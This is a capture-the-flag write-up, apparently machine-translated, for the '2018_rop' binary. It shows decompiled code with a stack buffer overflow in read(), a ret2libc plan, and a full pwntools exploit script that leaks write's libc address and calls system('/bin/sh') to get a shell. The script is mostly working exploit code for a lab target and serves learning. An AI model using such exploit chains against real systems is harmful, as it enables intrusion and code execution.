【CTF】 2018_ rop

Topic analysis

1 Decompile , Look for exploitable vulnerabilities

void main(void)
{
    
  be_nice_to_people();
  vulnerable_function();
  write(1,"Hello, World\n",0xd);
  return;
}

from main Function to see , function vulnerable_function Is the most obvious hint , Big probability is the breakthrough point , however be_nice_to_people You can also take a look .

void be_nice_to_people(void)
{
    
  __gid_t __rgid;
  __rgid = getegid();
  setresgid(__rgid,__rgid,__rgid);
  return;
}

ok , I really don't see any points that can be used , Check the following information , Nor did we find the necessity for the existence of this function , To be determined .

void vulnerable_function(void)
{
    
  undefined local_8c [136];
  read(0,local_8c,0x100);
  return;
}

ok, This is a typical overflow ,read The length limit of is greater than the length of the array .

2 Analysis and utilization chain

1 Find the entire decompile project , Haven't seen system perhaps execve Such as function , I didn't see /bin/sh character string , No other available functions were found , That's basically certain ret2libc The routine
2 Need to get libc The address of the function in , That's a useful point , It is through write Function to print out
3 then , Calculate from the address system and /bin/sh The address of
4 Need to execute again , Then you need to jump to... Again after overflowing vulnerable_function
5 adopt vulnerable_function Perform overflow jump to again system
ok, 1 2 3 5 It's all routine ,4 Need to study how to jump , not so bad , The function return address learned in the previous chapter (call And function direct call ) It can be used , Try it out , It works .

Using scripts

1 from pwn import *
  2 from LibcSearcher import *
  3 elf = ELF('2018_rop')
  4 libc = ELF('libc-2.27.so') #  Replace according to the environment 
  5
  6 context(arch = 'amd64', os = 'linux',log_level = 'debug', terminal="/bin/sh")
  7
  8 #asm() Convert the received string into sink encoded machine code , and shellcraft Can generate asm Under the shellcode
  9 #shellcode=asm(shellcraft.amd64.linux.sh())
 10 #print(len(shellcode))
 11 #print(shellcode)
 12
 13 sh = process('./2018_rop')
 14 pad = 'A' * 140
 15 write_got_addr = 0x0804a010
 16 vulner_addr = 0x080484d4 #  The return address 
 17 payload = pad.encode()
    # write function plt Address  + write Function return address  + write Parameters 1 + write function got Address  + write Parameters 3
    #  Realization effect , Print write Function memory address , Also return to vulnerable_function Re execution 
 18 payload += p32(0x080483a0)  + p32(vulner_addr)  + p32(0x01) + p32(write_got_addr) + p32(0x20)
 19
 20 sh.sendline(payload)
 21 content = sh.recv()[:4]
 22 mem_addr = int.from_bytes(content, 'little')
 23 print("%#x -> %s" % (write_got_addr, hex(mem_addr)))
 24
 25 #  Try... First lib-database lookup 
 26 obj = LibcSearcher("write", mem_addr)
 27 obj.dump('system')
 28
 29 libc_write_offset = libc.sym['write']
 30 print(hex(libc_write_offset))
 31
 32 libc_system_offset = libc.sym['system']
 33 print(hex(libc_system_offset))
 34
 35 libc_database = mem_addr - libc_write_offset
 36
 37 mem_system_addr = libc_database + libc_system_offset
 38 print(hex(mem_system_addr))
 39
 40 mem_binsh = libc_database + next(libc.search(b'/bin/sh'))
 41 print(hex(mem_binsh))
 42
 43 # system Function memory address  + system Function return address ( It doesn't matter here ) + /bin/sh Memory address of 
 44 payload1 = pad.encode() + p32(mem_system_addr) + p32(0x12345678) + p32(mem_binsh)
 45 sh.sendline(payload1)
 46
 47 with open('payload.txt', 'wb') as f:
 48    f.write(payload)
 49    f.write(payload1)
 50
 51
 52 sh.interactive()

summary

I always feel that my understanding of stack is not deep enough , It needs systematic study , But no good information was found , I can only learn while brushing questions .